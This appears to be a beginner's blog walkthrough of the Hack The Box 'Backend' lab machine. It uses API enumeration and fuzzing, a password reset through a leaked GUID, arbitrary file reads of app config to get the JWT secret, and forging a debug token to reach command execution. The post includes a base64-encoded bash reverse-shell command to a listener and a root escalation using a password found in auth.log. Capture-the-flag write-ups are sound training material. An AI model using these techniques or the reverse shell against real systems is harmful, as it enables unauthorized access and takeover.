Hello, guys welcome to my blog. Today we going to see a walkthrough or writeup for the backend hack the box machine which was created by Ippsec and we going to take over the user flag and root flag from the machine. Basically, this machine is based on API Abuse so let us get started….
ALERT:
THIS ARTICLE IS COMPLETELY FOR THE BEGINNERS TO SOLVE THE MACHINE AND WE AVOID MORE TECHNICAL TERMS FOR NON-TECHNICAL PEOPLE AND TECHNICAL PEOPLE ALSO. THANK YOU
About Machine:
This backend machine is based on the API abuse and enumeration from that we can able to get admin access at swagger docs and by the command injection vulnerability, we can able to get the shell and further analyze the application log file you can able to get the root flag.
So first we start up with the Nmap scan
STEP 1: nmap -sC -sV 10.10.11.161
Further analyzing this Nmap report you can able to see the two-ports 22 SSH and 80 HTTP and further seeing this you can able to see uvicorn which is an interesting hint
Uvicorn is nothing but it is an ASGI webserver implementation of Python.
So let we look at the web page in the browser you can able see the JSON data
Let us try to enumerate this web page using the feroxbuster tool
STEP 2: feroxbuster -u http://10.10.11.161
So by seeing this report, you can able to see the two interesting directories of docs and API whereas the docs are the 401 status code which is not authenticated
So let us see the API directory which has 200 status code
Now you can able to see the v1 endpoint so let we try this endpoint
STEP 3: http://10.10.11.101/api/v1
Now you will get the two endpoints of user and admin.
After trying these two endpoints you will get not authenticated JSON response.
So let us brute force the directory using the feroxbuster or WFUZZ tool
In this scenario, I going to use the wfuzz tool
First, we going to fuzz in the user endpoint
STEP 4: wfuzz -u http://10.10.11.161/api/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
While fuzzing this you will get more 422 code so let us hide it using the — hc
STEP 5: wfuzz -u http://10.10.11.161/api/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt — hc 422
Now you are able to see the lot ID or directory so let us try one by one and we going to capture this request in the burp suite for further analysis.
so first I have taken the number 1 ID which is admin ID so let we capture this request in burp
while capturing this request nothing should be interesting so let us further emulate the using the wfuzz by changing the method to POST
STEP 6: wfuzz -u http://10.10.11.161/api/v1/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -X POST — hc 404,405
Now you can able see these two interesting directories of login and signup and capture this request in burp (change the GET method POST method)
So next we going to signup on this website
So first capture that request of signup
And send this request to the repeater and change the GET method to the POST method and add the content-type: JSON/application
And next enter the email and password in the body section (shown in the below ) and send the request it will give the response of 201 status code which is created
So next we going to log in with a username and password using the curl tool because it's an easy way to get the authorization token and you can able get this in burp suite also but I will always prefer the easy way for beginners
STEP 7: curl -X POST http://10.10.11.161/api/v1/user/login -d ‘username=evil@htb1.in&password=evilox’
So now you can able see the authorization token for that username and password so let us use this token in the DOCS directory
Before that download this addon of Simply Modify Header
So first enter into the docs folder
So next open simply modify the header addon first add the URL which http://10.10.11.161/*
And name the header field: authorization and enter the token in the header field value and save it and click the start button and before add the bearer
Now open the burp suite you can able see the request (check if any errors)
After opening click the secret flag and click the try it out and click the execute button
you can able to see the user flag which is the user.txt
boooooooooooooommmm.
Root Flag
So first we going to check the weather our role is admin or not using the admin check
But the result is false so now we going to become admin using the guid
So first go to the Fetch user which is /api/v1/user/{user_id}/
Next, give the user_id which is 1
Now you can able to see the guid in your response
Copy that guid and paste in the update password and enter any password to become an admin
So now the password is updated.
So next we going to authorize using the user and password.
Now you get authorized
So now check whether now we are admin or not
Hooooooo!!! It shows true and copy the authorization token
So next we going to run the command in /api/v1/admin/exec/{command} and I going to capture this burp suite because I'm lazy to scroll down and see.
But it throws an error 404 not found because it does not support the ( / +) etc… symbols
So let's try normal command of whoami or ls or PWD
But it the throws the Debug key missing from JWT
So our next goal is to find the JWT debug key in the get file which is /api/v1/admin/file
I think this is affected by LFI because we can able give any Linux based files so let we try it out
I have tried out that /etc/passwd…
hooooooo!! So let us check the environment of web code which is /proc/self/environ
You will get code and copy that code paste it in sublime or vim or anything but in this case, I going to use sublime because it is beginner-friendly
I have removed the /000u
Further analyzing this code I have found one interesting directory which is an app and the python file is main.py so let us check it because the module has been imported from there
which is located in /home/htb/uhc/app/main.py
After analyzing the file you can able see the two endpoints files which the user and admin
first, we going to check the admin file.
which is located at /home/htb/uhc/app/api/v1/endpoints/admin.py
And paste in text editor or sublime
Further analyzing this file I have found the deps.py file so let’s check it
Further analyzing this file I have found the settings because I think there is JWT secret token
Why I choose this token means because the debug key throws the error ( note this )
And I have found that the setting is imported from config.py
So let us check in the config file
/home/htb/uhc/app/core/config.py
Now you can able see the secret key of JWT
woooooooooooooooooooooo!!!!!!!!
So next we going to add this secret key to the authorization token
let open the jwt.io website and paste that admin authorization token to add the secret key
Paste the secret key to verify the signature and there is random secret key please erase it.
And next set the “debug”: true
And copy that key and go to that /api/v1/admin/exec/{command} and execute that command
In initial stage, we got this error
So now erase that authentication key and paste it
Now you will get the response 200 OKs ( the error has been removed )
Now we going to get the reverse shell and encode it with base 64
STEP 8: echo “bash -i >& /dev/tcp/10.10.11.xx/3333 0>&1” | base64
Now you get the base64 encoded payload
After getting this paste in the burp suite
If you send this means it will not work so send that in URL encode all character
Before that start the reverse connection in netcat
After sending the request you will get the shell in netcat
So we going to spawn the /bin/bash
STEP 11: python3 -c ‘import pty;pty.spawn(“/bin/bash”)
And click the ctrl +z to run the shell in the background process
STEP 12: stty raw -echo; fg
Further analyzing this machine I have found the thief in auth.log
STEP 13: cat auth.log
So now you can able see the password
type su now it will ask the password enter that password you will get the root shell
boooooooooooooooooommmmmmm!!!!!!
Now you will get the root flag which is root.txt
I hope you will like this article if this please be subscribed to us and if you like my work donate to us
If you like my writeup please donate to us for my OSCP Exam
please contact us on LinkedIn
Please contact us on Instagram
